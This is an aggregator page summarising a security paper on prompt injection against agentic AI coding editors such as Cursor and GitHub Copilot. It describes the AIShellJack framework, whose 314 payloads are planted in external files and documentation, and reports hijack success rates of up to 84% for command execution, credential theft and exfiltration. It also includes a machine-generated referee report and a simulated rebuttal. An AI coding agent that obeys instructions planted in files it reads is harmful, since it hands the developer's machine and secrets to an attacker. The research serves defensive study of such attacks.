pith. sign in

arxiv: 2509.22040 · v2 · submitted 2025-09-26 · 💻 cs.CR · cs.SE

"Your AI, My Shell": Demystifying Prompt Injection Attacks on Agentic AI Coding Editors

Pith reviewed 2026-05-18 13:16 UTC · model grok-4.3

classification 💻 cs.CR cs.SE
keywords prompt injectionagentic AIcoding editorssecurity vulnerabilitiesMITRE ATT&CKGitHub CopilotCursormalicious command execution
0
0 comments X

The pith

Prompt injection attacks can hijack agentic AI coding editors by poisoning external resources to execute malicious commands.

A machine-rendered reading of the paper's core claim, the machinery that carries it, and where it could break.

The paper examines how attackers can exploit agentic AI coding editors such as Cursor and GitHub Copilot by embedding malicious instructions in external development resources like files or documentation. These editors possess elevated privileges to run terminal commands and interact with systems, which the attacks leverage to hijack the AI agents. The authors built AIShellJack, a framework containing 314 attack payloads drawn from 70 MITRE ATT&CK techniques, and used it to test the editors at scale. Results show success rates reaching 84 percent in causing the AI to run attacker-chosen commands, enabling goals from system access to data theft. A sympathetic reader would care because these tools are increasingly used for automated coding workflows, so such hijacks could compromise developer environments without direct user action.

Core claim

By poisoning external resources with hidden instructions, attackers can remotely hijack the AI agents inside high-privilege coding editors, turning them into shells that execute malicious commands; large-scale tests with AIShellJack confirm this works at rates up to 84 percent across initial access, discovery, credential theft, and exfiltration objectives on GitHub Copilot and Cursor.

What carries the argument

AIShellJack, an automated testing framework that supplies 314 unique prompt injection payloads covering 70 MITRE ATT&CK techniques to evaluate how external resources can influence AI agent behavior in coding editors.

If this is right

  • Attackers gain remote initial access to development environments through the compromised AI without needing direct interaction.
  • System discovery, credential theft, and data exfiltration become achievable objectives via the hijacked agent.
  • The attacks succeed against real editors that grant terminal and system-level privileges for coding tasks.
  • Common external resources such as code files or documentation can serve as vectors for the injection.

Where Pith is reading between the lines

These are editorial extensions of the paper, not claims the author makes directly.

  • Developers using these editors might reduce risk by reviewing AI-proposed actions before execution or restricting access to untrusted external files.
  • Similar prompt injection risks could appear in other agentic AI tools that load external inputs and then perform autonomous actions.
  • Adding input validation or prompt isolation layers in future editor versions could block this class of attack.

Load-bearing premise

The AI agents will read and act on instructions placed inside external resources without any built-in checks that prevent harmful command execution.

What would settle it

Loading a deliberately poisoned external file into Cursor or Copilot and observing that the AI agent neither executes the embedded malicious command nor takes any action based on it.

Figures

Figures reproduced from arXiv: 2509.22040 by David Lo, Haoyu Wang, Ting Zhang, Yanjie Zhao, Yue Liu, Yunbo Lyu.

Figure 1
Figure 1. Figure 1: “Your AI, My Shell”: Prompt Injection Attack [PITH_FULL_IMAGE:figures/full_fig_p002_1.png] view at source ↗
Figure 2
Figure 2. Figure 2: Example of GitHub Copilot being manipulated [PITH_FULL_IMAGE:figures/full_fig_p005_2.png] view at source ↗
Figure 4
Figure 4. Figure 4: Overview of Our AIShellJack In this way, the attacker successfully transforms “Your AI” coding editors into “Attacker’s Shell” to perform malicious actions on the developer’s machine without their knowledge or consent. 3.2 Threat Model Attackers’ Goal: The attacker’s goal is to insert attack payloads P𝑝𝑎𝑦𝑙𝑜𝑎𝑑 into external resources 𝑅 that developers may import into their IDE workspaces. So the agentic AI … view at source ↗
Figure 5
Figure 5. Figure 5: Example Payload Construction and Injection for T1560.001.03 Since our attack relies on natural language instruc￾tions to convince the AI coding editors to generate and run the corresponding terminal commands, we need to review and sanitize the descriptions provided in atomic-red-team for each command (P𝑐𝑚𝑑 ). Some MITRE ATT&CK descriptions can be used as P𝑑𝑒𝑠𝑐 di￾rectly without modification if they already… view at source ↗
Figure 7
Figure 7. Figure 7: Attack Success Rates Across Different AI Cod [PITH_FULL_IMAGE:figures/full_fig_p011_7.png] view at source ↗
Figure 8
Figure 8. Figure 8: Attack Success Rates Across Categories by [PITH_FULL_IMAGE:figures/full_fig_p013_8.png] view at source ↗
read the original abstract

Agentic AI coding editors driven by large language models have recently become more popular due to their ability to improve developer productivity during software development. Modern editors such as Cursor are designed not just for code completion, but also with more system privileges for complex coding tasks (e.g., run commands in the terminal, access development environments, and interact with external systems). While this brings us closer to the "fully automated programming" dream, it also raises new security concerns. In this study, we present the first empirical analysis of prompt injection attacks targeting these high-privilege agentic AI coding editors. We show how attackers can remotely exploit these systems by poisoning external development resources with malicious instructions, effectively hijacking AI agents to run malicious commands, turning "your AI" into "attacker's shell". To perform this analysis, we implement AIShellJack, an automated testing framework for assessing prompt injection vulnerabilities in agentic AI coding editors. AIShellJack contains 314 unique attack payloads that cover 70 techniques from the MITRE ATT&CK framework. Using AIShellJack, we conduct a large-scale evaluation on GitHub Copilot and Cursor, and our evaluation results show that attack success rates can reach as high as 84% for executing malicious commands. Moreover, these attacks are proven effective across a wide range of objectives, ranging from initial access and system discovery to credential theft and data exfiltration.

Editorial analysis

A structured set of objections, weighed in public.

Desk editor's note, referee report, simulated authors' rebuttal, and a circularity audit. Tearing a paper down is the easy half of reading it; the pith above is the substance, this is the friction.

Referee Report

2 major / 2 minor

Summary. The paper claims to conduct the first empirical analysis of prompt injection attacks on agentic AI coding editors like GitHub Copilot and Cursor. It introduces the AIShellJack framework containing 314 unique attack payloads covering 70 MITRE ATT&CK techniques and reports that these attacks achieve success rates up to 84% in executing malicious commands through poisoning external resources.

Significance. If the results are reproducible and the evaluation accounts for realistic agent behaviors, this study would significantly contribute to the understanding of security risks in emerging AI coding tools with system privileges. The systematic coverage of attack techniques from MITRE ATT&CK is a notable strength, providing a comprehensive view of potential threats.

major comments (2)
  1. The abstract and evaluation section report an 84% attack success rate, but the manuscript does not provide details on the total number of experiments conducted, the criteria for determining success (e.g., actual command execution verification), or controls for agent context selection mechanisms that might filter injected prompts from files like READMEs or configs.
  2. While 314 payloads are mentioned, there is insufficient description of how these payloads were designed to bypass potential safety layers in the AI agents, and whether the evaluation tested scenarios where the agent summarizes or ignores external content.
minor comments (2)
  1. Some sentences could be clarified regarding the distinction between traditional prompt injection and the specific context of agentic editors with terminal access.
  2. The paper would benefit from including raw data or anonymized logs as supplementary material to support the reported success rates.

Simulated Author's Rebuttal

2 responses · 0 unresolved

We thank the referee for their detailed and constructive review of our manuscript. We appreciate the opportunity to clarify aspects of our experimental methodology and will incorporate revisions to address the concerns raised.

read point-by-point responses
  1. Referee: The abstract and evaluation section report an 84% attack success rate, but the manuscript does not provide details on the total number of experiments conducted, the criteria for determining success (e.g., actual command execution verification), or controls for agent context selection mechanisms that might filter injected prompts from files like READMEs or configs.

    Authors: We agree that these methodological details should be more explicitly documented to support reproducibility. In the revised manuscript, we will add a dedicated subsection in the Evaluation section specifying the total number of experiments performed, the success criteria (defined as verified execution of the malicious command via terminal output logging and environment state checks), and our approach to agent context handling. Our tests included direct poisoning of files such as READMEs and configuration files that agents were instructed to read in full, with observations that context selection did not systematically filter the injected prompts in the evaluated setups. revision: yes

  2. Referee: While 314 payloads are mentioned, there is insufficient description of how these payloads were designed to bypass potential safety layers in the AI agents, and whether the evaluation tested scenarios where the agent summarizes or ignores external content.

    Authors: We acknowledge that the payload design process merits expanded explanation. The 314 payloads were constructed by adapting established prompt injection patterns to the coding agent context and mapping them to 70 MITRE ATT&CK techniques, with specific elements such as indirect instruction overriding and role assumption included to navigate safety alignments. We will revise the AIShellJack framework description to provide concrete examples and rationale for these bypass strategies. Our evaluation did encompass scenarios in which agents were prompted to summarize or process external content (including cases where summarization occurred), and attack success was measured in those conditions as well; we will report these results separately in the revised evaluation to make this coverage explicit. revision: yes

Circularity Check

0 steps flagged

No circularity: purely empirical measurement study with observed outcomes

full rationale

This paper conducts an empirical evaluation of prompt injection attacks by implementing the AIShellJack testing framework and measuring attack success rates (up to 84%) on GitHub Copilot and Cursor through direct experimentation with 314 payloads. No equations, derivations, predictions, or first-principles results are present. There are no self-definitional elements, fitted inputs renamed as predictions, or load-bearing self-citations that reduce claims to inputs by construction. The central results are observed experimental outcomes from running attacks, making the study self-contained against external benchmarks such as actual editor executions. This is the expected finding for a measurement paper with no mathematical chain to inspect.

Axiom & Free-Parameter Ledger

0 free parameters · 1 axioms · 0 invented entities

The central claim rests on the empirical observation of attack success rather than new mathematical axioms or invented entities; the only notable assumption is that the tested editors will follow instructions from poisoned external sources.

axioms (1)
  • domain assumption AI agents in coding editors will interpret and act on instructions found in external development resources as part of completing coding tasks.
    This premise is required for poisoning external resources to translate into command execution; it is stated implicitly in the attack model.

pith-pipeline@v0.9.0 · 5796 in / 1244 out tokens · 46802 ms · 2026-05-18T13:16:03.392931+00:00 · methodology

discussion (0)

Sign in with ORCID, Apple, or X to comment. Anyone can read and Pith papers without signing in.

Lean theorems connected to this paper

Citations machine-checked in the Pith Canon. Every link opens the source theorem in the public Lean library.

What do these tags mean?
matches
The paper's claim is directly supported by a theorem in the formal canon.
supports
The theorem supports part of the paper's argument, but the paper may add assumptions or extra steps.
extends
The paper goes beyond the formal theorem; the theorem is a base layer rather than the whole result.
uses
The paper appears to rely on the theorem as machinery.
contradicts
The paper's claim conflicts with a theorem or certificate in the canon.
unclear
Pith found a possible connection, but the passage is too broad, indirect, or ambiguous to say the theorem truly supports the claim.

Forward citations

Cited by 3 Pith papers

Reviewed papers in the Pith corpus that reference this work. Sorted by Pith novelty score.

  1. Heimdallr: Characterizing and Detecting LLM-Induced Security Risks in GitHub CI Workflows

    cs.CR 2026-05 unverdicted novelty 8.0

    Heimdallr detects LLM-induced security risks in GitHub CI workflows by normalizing them into an LLM-Workflow Property Graph and combining triggerability analysis with LLM-assisted dataflow summarization, achieving ove...

  2. LogJack: Indirect Prompt Injection Through Cloud Logs Against LLM Debugging Agents

    cs.CR 2026-04 conditional novelty 7.0

    LogJack shows indirect prompt injection via cloud logs succeeds in making LLM agents execute remote code on 6 of 8 models, with most cloud guardrails failing to detect the attacks.

  3. Your Agent, Their Asset: A Real-World Safety Analysis of OpenClaw

    cs.CR 2026-04 conditional novelty 6.0

    Poisoning any single CIK dimension of an AI agent raises average attack success rate from 24.6% to 64-74% across models, and tested defenses leave substantial residual risk.

Reference graph

Works this paper leans on

54 extracted references · 54 canonical work pages · cited by 3 Pith papers · 1 internal anchor

  1. [1]

    Lepton AI. 2025. search_with_lepton. https://github.com/leptonai/search_with_lepton. Accessed: July 15, 2025

  2. [2]

    Amazon. 2025. Amazon Q Developer. https://aws.amazon.com/q/developer/. Accessed: July 19, 2025

  3. [3]

    Anonymous. 2025. Reproduction package. https://doi.org/10.6084/m9.figshare.30111988. Accessed: June 25, 2025

  4. [4]

    Divyansh Bhatia. 2025. The AI Model Race: Claude 4 vs GPT-4.1 vs Gemini 2.5 Pro. https://medium.com/ @divyanshbhatiajm19/the-ai-model-race-claude-4-vs-gpt-4-1-vs-gemini-2-5-pro-dab5db064f3e. Accessed: June 25, 2025

  5. [5]

    Elena Cross. 2025. The "S" in MCP Stands for Security. https://news.ycombinator.com/item?id=43600192

  6. [6]

    Cursor. 2024. Rules. https://docs.cursor.com/en/context/rules. Accessed: July 19, 2025

  7. [7]

    Cursor. 2025. Available models in Cursor. https://docs.cursor.com/models. Accessed: July 15, 2025

  8. [8]

    Cursor. 2025. Cursor - The AI Code Editor. https://cursor.com/. Accessed: July 19, 2025

  9. [9]

    Cursor Forum. 2025. Always run all commands without user confirmation. https://forum.cursor.com/t/always-run-all- commands-without-user-confirmation/31199. Accessed: August 25, 2025

  10. [10]

    Cursor Forum. 2025. Always run command. https://forum.cursor.com/t/always-run-command/29737. Accessed: August 25, 2025

  11. [11]

    Cursor Forum. 2025. Cursor tried to wipe my computer. https://forum.cursor.com/t/cursor-tried-to-wipe-my- computer/107142. Accessed: August 25, 2025

  12. [12]

    Badhan Chandra Das, M Hadi Amini, and Yanzhao Wu. 2025. Security and privacy challenges of large language models: A survey.Comput. Surveys57, 6 (2025), 1–39

  13. [13]

    Edoardo Debenedetti, Jie Zhang, Mislav Balunovic, Luca Beurer-Kellner, Marc Fischer, and Florian Tramèr. 2024. Agentdojo: A dynamic environment to evaluate prompt injection attacks and defenses for llm agents.Advances in Neural Information Processing Systems37 (2024), 82895–82920

  14. [14]

    Gabe Ragland. 2025. chatgpt-chrome-extension. https://github.com/gragland/chatgpt-chrome-extension. Accessed: July 15, 2025

  15. [15]

    GitHub. 2025. GitHub Copilot. https://github.com/features/copilot. Accessed: July 19, 2025

  16. [16]

    GitHub. 2025. Start and track GitHub Copilot coding agent sessions from Visual Studio Code. https://github.blog/ changelog/2025-07-14-start-and-track-github-copilot-coding-agent-sessions-from-visual-studio-code/. Accessed: July 19, 2025

  17. [17]

    Google Cloud. 2025. What is Vibe Coding? https://cloud.google.com/discover/what-is-vibe-coding. Accessed: August 25, 2025

  18. [18]

    Xinyi Hou, Yanjie Zhao, Shenao Wang, and Haoyu Wang. 2025. Model context protocol (mcp): Landscape, security threats, and future research directions.arXiv preprint arXiv:2503.23278(2025)

  19. [19]

    Yizhan Huang, Yichen Li, Weibin Wu, Jianping Zhang, and Michael R Lyu. 2024. Your code secret belongs to me: Neural code completion tools can memorize hard-coded credentials.Proceedings of the ACM on Software Engineering1, FSE (2024), 2515–2537

  20. [20]

    Bo Hui, Haolin Yuan, Neil Gong, Philippe Burlina, and Yinzhi Cao. 2024. Pleak: Prompt leaking attacks against large language model applications. InProceedings of the 2024 on ACM SIGSAC Conference on Computer and Communications Security. 3600–3614. Proc. ACM Softw. Eng., Vol. 1, No. 1, Article 1. Publication date: October 2025. 1:20 Yue Liu, Yanjie Zhao, Y...

  21. [21]

    Kuo-Han Hung, Ching-Yun Ko, Ambrish Rawat, I Chung, Winston H Hsu, Pin-Yu Chen, et al. 2024. Attention tracker: Detecting prompt injection attacks in llms.arXiv preprint arXiv:2411.00348(2024)

  22. [22]

    Jordan Novet. 2025. Microsoft introduces GitHub AI agent that can code for you. https://www.cnbc.com/2025/05/19/ microsoft-ai-github.html. Accessed: July 19, 2025

  23. [23]

    Jan H Klemmer, Stefan Albert Horstmann, Nikhil Patnaik, Cordelia Ludden, Cordell Burton Jr, Carson Powers, Fabio Massacci, Akond Rahman, Daniel Votipka, Heather Richter Lipford, et al . 2024. Using ai assistants in software development: A qualitative study on security practices and concerns. InProceedings of the 2024 on ACM SIGSAC Conference on Computer a...

  24. [24]

    Ravie Lakshmanan. 2025. New ’Rules File Backdoor’ Attack Lets Hackers Inject Malicious Code via AI Code Editors. https://thehackernews.com/2025/03/new-rules-file-backdoor-attack-lets.html. Accessed: 2025-05-17

  25. [25]

    Elizabeth Lin, Igibek Koishybayev, Trevor Dunlap, William Enck, and Alexandros Kapravelos. 2024. Untrustide: Exploiting weaknesses in vs code extensions. InProceedings of the ISOC Network and Distributed Systems Symposium (NDSS). Internet Society

  26. [26]

    Yupei Liu, Yuqi Jia, Runpeng Geng, Jinyuan Jia, and Neil Zhenqiang Gong. 2024. Formalizing and benchmarking prompt injection attacks and defenses. In33rd USENIX Security Symposium (USENIX Security 24). 1831–1847

  27. [27]

    Yupei Liu, Yuqi Jia, Jinyuan Jia, Dawn Song, and Neil Zhenqiang Gong. 2025. DataSentinel: A Game-Theoretic Detection of Prompt Injection Attacks. In2025 IEEE Symposium on Security and Privacy (SP). IEEE, 2190–2208

  28. [28]

    Yue Liu, Chakkrit Tantithamthavorn, and Li Li. 2025. Protect Your Secrets: Understanding and Measuring Data Exposure in VSCode Extensions. In2025 IEEE International Conference on Software Analysis, Evolution and Reengineering (SANER). IEEE, 551–562

  29. [29]

    Ludic. 2025. ludic. https://github.com/getludic/ludic. Accessed: July 15, 2025

  30. [30]

    My productivity is boosted, but

    Yunbo Lyu, Zhou Yang, Jieke Shi, Jianming Chang, Yue Liu, and David Lo. 2025. " My productivity is boosted, but... " Demystifying Users’ Perception on AI Coding Assistants.arXiv preprint arXiv:2508.12285(2025)

  31. [31]

    Vahid Majdinasab, Michael Joshua Bishop, Shawn Rasheed, Arghavan Moradidakhel, Amjed Tahir, and Foutse Khomh

  32. [32]

    In2024 IEEE International Conference on Software Analysis, Evolution and Reengineering (SANER)

    Assessing the security of github copilot’s generated code-a targeted replication study. In2024 IEEE International Conference on Software Analysis, Evolution and Reengineering (SANER). IEEE, 435–444

  33. [33]

    N64Recomp. 2025. N64Recomp. https://github.com/N64Recomp/N64Recomp. Accessed: July 15, 2025

  34. [34]

    National Institute of Standards and Technology. 2025. CVE-2025-54135 Detail. https://nvd.nist.gov/vuln/detail/CVE- 2025-54135. Accessed: July 19, 2025

  35. [35]

    OWASP. 2025. OWASP Top 10 for Large Language Model Applications. https://owasp.org/www-project-top-10-for- large-language-model-applications/. Accessed: August 25, 2025

  36. [36]

    PatrickJS. 2025. CursorRules: A New Way to Inject Malicious Code into AI Code Editors. https://github.com/PatrickJS/ awesome-cursorrules. Accessed: 2025-05-17

  37. [37]

    Hammond Pearce, Baleegh Ahmad, Benjamin Tan, Brendan Dolan-Gavitt, and Ramesh Karri. 2025. Asleep at the keyboard? assessing the security of github copilot’s code contributions.Commun. ACM68, 2 (2025), 96–105

  38. [38]

    Neil Perry, Megha Srivastava, Deepak Kumar, and Dan Boneh. 2023. Do users write more insecure code with ai assistants?. InProceedings of the 2023 ACM SIGSAC conference on computer and communications security. 2785–2799

  39. [39]

    PyTorch Labs. 2025. gpt-fast. https://github.com/pytorch-labs/gpt-fast. Accessed: July 15, 2025

  40. [40]

    Qodo AI. 2025. 2025 StateofAI code quality. https://www.qodo.ai/reports/state-of-ai-code-quality/. Accessed: August 25, 2025

  41. [41]

    Red Canary. 2025. Atomic Red Team. https://github.com/redcanaryco/atomic-red-team. Accessed: June 10, 2025

  42. [42]

    Gustavo Sandoval, Hammond Pearce, Teo Nys, Ramesh Karri, Siddharth Garg, and Brendan Dolan-Gavitt. 2023. Lost at c: A user study on the security implications of large language model code assistants. In32nd USENIX Security Symposium (USENIX Security 23). 2205–2222

  43. [43]

    Stack Overflow. 2025. Stack Overflow Developer Survey 2025. https://survey.stackoverflow.co/2025/ai. Accessed: July 19, 2025

  44. [44]

    SurveyMonkey. 2025. Sample size calculator. https://www.surveymonkey.com/mp/sample-size-calculator/. Accessed: July 19, 2025

  45. [45]

    SWEbench. 2024. SWEbench: The Software Engineering Benchmark for AI Models. https://www.swebench.com/. Accessed: June 25, 2025

  46. [46]

    Tap Twice Digital. 2025. 10 Cursor Statistics (2025). https://taptwicedigital.com/cursor. Accessed: July 19, 2025

  47. [47]

    The MITRE Corporation. 2025. MITRE ATT&CK. https://attack.mitre.org/. Accessed: June 10, 2025

  48. [48]

    Anthony J Viera, Joanne M Garrett, et al. 2005. Understanding interobserver agreement: the kappa statistic.Fam med 37, 5 (2005), 360–363

  49. [49]

    Visual Studio Code. 2025. Use MCP servers in VS Code. https://code.visualstudio.com/docs/copilot/chat/mcp-servers. Accessed: July 19, 2025

  50. [50]

    Your AI, My Shell

    Wikipedia. 2024. GPT-4o. https://en.wikipedia.org/wiki/GPT-4o. Accessed: June 25, 2025. Proc. ACM Softw. Eng., Vol. 1, No. 1, Article 1. Publication date: October 2025. “Your AI, My Shell”: Demystifying Prompt Injection Attacks on Agentic AI Coding Editors 1:21

  51. [51]

    Simon Willison. 2025. Model Context Protocol has prompt injection security problems. https://simonwillison.net/ 2025/Apr/9/mcp-prompt-injection/

  52. [52]

    Jiaqi Xue, Mengxin Zheng, Ting Hua, Yilin Shen, Yepeng Liu, Ladislau Bölöni, and Qian Lou. 2023. Trojllm: A black- box trojan prompt attack on large language models.Advances in Neural Information Processing Systems36 (2023), 65665–65677

  53. [53]

    Jingwei Yi, Yueqi Xie, Bin Zhu, Emre Kiciman, Guangzhong Sun, Xing Xie, and Fangzhao Wu. 2025. Benchmarking and defending against indirect prompt injection attacks on large language models. InProceedings of the 31st ACM SIGKDD Conference on Knowledge Discovery and Data Mining V. 1. 1809–1820

  54. [54]

    Albert Ziegler, Eirini Kalliamvakou, X Alice Li, Andrew Rice, Devon Rifkin, Shawn Simister, Ganesh Sittampalam, and Edward Aftandilian. 2024. Measuring github copilot’s impact on productivity.Commun. ACM67, 3 (2024), 54–63. Proc. ACM Softw. Eng., Vol. 1, No. 1, Article 1. Publication date: October 2025